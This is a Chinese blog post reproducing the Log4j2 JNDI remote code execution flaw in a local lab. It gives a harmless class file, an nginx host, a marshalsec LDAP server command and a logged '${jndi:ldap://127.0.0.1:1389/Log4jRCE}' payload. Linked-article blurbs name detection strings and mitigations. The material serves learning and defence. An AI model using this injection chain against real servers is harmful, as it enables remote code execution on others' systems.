Log4j2漏洞复现

最新推荐文章于 2024-08-16 11:00:06 发布
最新推荐文章于 2024-08-16 11:00:06 发布
阅读量8.3k 收藏 4
点赞数 1
分类专栏: JAVA学习 文章标签: 安全 web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43719932/article/details/121922387
版权

Log4j2漏洞复现

一、前言

最近Log4j2的漏洞算是刷屏了。博主也就跟风学习了一下,虽不说开发能力有啥提升,但是也算是学了点知识吧。这次就分享一下Log4j2漏洞的复现场景,以供大家参考。

二、参考文章

三、漏洞触发流程图

这里使用LDAP服务进行演示
在这里插入图片描述
解释:Web服务为受害者对象,LDAP和HTTP服务为攻击者对象。

一句话概括:攻击者利用log4j2的JNDI技术发送恶意请求,使受害者获取自己的恶意字节码文件并执行。

四、代码复现

  1. 书写一个恶意字节码文件并用Javac进行编译
public class Log4jRCE {
    static {
        System.out.println("I am Log4jRCE from remote!!!");
    }
}

javac Log4jRCE.java

获得这个字节码文件
在这里插入图片描述

  1. 启动nginx并把class文件放入nginx的html文件夹,可以通过http://ip:port/file.class进行获取
start nginx

浏览器数据http://127.0.0.1:8000/Log4jRCE.class可以获取该字节码文件

  1. 启动LDAP服务器,暴漏这个字节码文件
git clone git@github.com:bkfish/Apache-Log4j-Learning.git
cd Apache-Log4j-Learning/tools
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Log4jRCE"
  1. 模拟一个server执行log.error()观察运行结果
    写一个RunApp.class
public class RunApp {

    private static final Logger logger = LogManager.getLogger(BugCode.class);

    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        logger.error("${jndi:ldap://127.0.0.1:1389/Log4jRCE}");
    }

}

启动结果为
在这里插入图片描述
会发现有一个“I am Log4jRCE from remote!!!”就是远程class文件的逻辑

一名假人
关注
专栏目录
log4j2漏洞复现
qq_17622203的博客
03-21 3279
参考链接 Apache Log4j2 远程代码执行漏洞 - xuzhujack - 博客园 CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现_网络¥安全联盟站的博客-CSDN博客 工具链接 DNSLog Platform https://github.com/welk1n/JNDI-Injection-Exploit/releases https://www.jackson-t.ca/runtime-exec-payloads.html 此次漏洞的出现,正是由用于
安全漏洞Log4j2漏洞复现绕过分析
AzulSystems的博客
03-04 217
Log4j2Java开发常用的日志框架,该漏洞触发条件低,危害大,由阿里云安全团队报告分配CVE编号:CVE-2021-44228CVSS评分:10.0(最高只能10分)POC比较简单POC虽然简单,但是搭建LDAP环境显得有点复杂,marshalsec方式需要自行编译class并搭建HTTP服务端java -jar LDAPKit.jar [命令]截图如下【一>所有资源获取
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现
heike_Ch的博客
08-14 1090
log4j2是2021年底爆出的非常严重的漏洞,可谓是风靡一时,“血洗互联网”,也是安全公司面试的常见题目,我们应该了解这个漏洞的原理及利用方式。如何排查是否受到了攻击?检查日志中是否存在"jndi:ldap://"、"jndi:rmi//"等字符来发现可能的攻击行为,前面复现的过程在payload的构造中都出现了这样的字符串,这是攻击的典型标志。如何对log4j2的攻击进行防御?1.设置log4j2.formatMsgNoLookups=True。
Themeleaf Nginx Logback Log4j2 Hibernate ApacheServer Hive Freemarker Flume 中文文档
07-28
'Apache Flume 1.9.0 中文文档.epub' 'Log4j2 中文文档.epub' 'Apache FreeMarker 2.3.28 中文文档.epub' 'Logback 1.3.0-alpha4 中文文档.epub' 'Apache Hive 3.1.1 中文文档.epub' 'Nginx 中文文档.epub' 'Apache Server 2.4 中文文档.epub' 'Thymeleaf 3.0 中文文档.epub' 'Hibernate 5.4 中文文档.epub'
Log4j2漏洞复现(CVE-2021-44228)
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
log4j2漏洞复现 (CVE-2021-44228)
m0_59958467的博客
10-29 942
log4j2漏洞复现 (CVE-2021-44228)
log4j2漏洞复现(CVE-2021-44228)
最新发布
人们并不感谢罗辑
08-16 1134
log4j2是一个记录日志的日志记录框架,他存在漏洞的原因是因为反序列化导致的远程代码执行(rce)。在日志记录的过程中使用了JNDI接口,这个接口调用了lookup方法,可以远程加载java对象。如果没有对这个方法进行限制,攻击者可以构造恶意代码,从而使得服务器被getshell
Log4j 2 (CVE-2021-44228)漏洞复现
Pluto.的博客
11-21 555
Log4j 2 (CVE-2021-44228)漏洞复现
Apache Log4j2漏洞复现
qq_62056583的博客
07-20 784
复现并分析【CVE-2021044228】Apache Log4j2 Server 反序列化命令执行漏洞,使用docker技术搭建漏洞环境,在实验环境中复现漏洞
apache log4j2 漏洞复现
06-28
Apache Log4j2漏洞是一种远程代码执行漏洞,攻击者可以利用该漏洞在受影响的服务器上执行任意代码。攻击者可以通过构造特定的请求,将恶意代码注入到受影响的服务器上,从而实现远程代码执行。该漏洞已被广泛利用,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值